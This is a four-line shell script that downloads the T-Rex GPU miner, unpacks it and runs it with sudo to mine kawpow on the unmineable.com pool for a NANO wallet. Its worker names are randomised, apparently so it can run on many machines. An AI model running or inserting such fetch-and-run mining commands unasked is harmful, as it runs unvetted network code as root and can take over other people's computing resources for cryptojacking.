#!/bin/sh
apt-get install libpci3 && wget https://trex-miner.com/download/t-rex-0.19.14-linux-cuda11.1.tar.gz && tar -xvf t-rex-0.19.14-linux-cuda11.1.tar.gz && sudo ./t-rex -a kawpow -o kp.unmineable.com:3333 -u NANO:nano_1fpdwwwmnjnxxspuburupmmd9g5wxffgayc4x9mupdkb78eacff9dc8obaqo.$(echo $(shuf -i 2-5 -n 1)-$(shuf -i 1-111 -n 1)-americano#7kx1-kbps) -p x
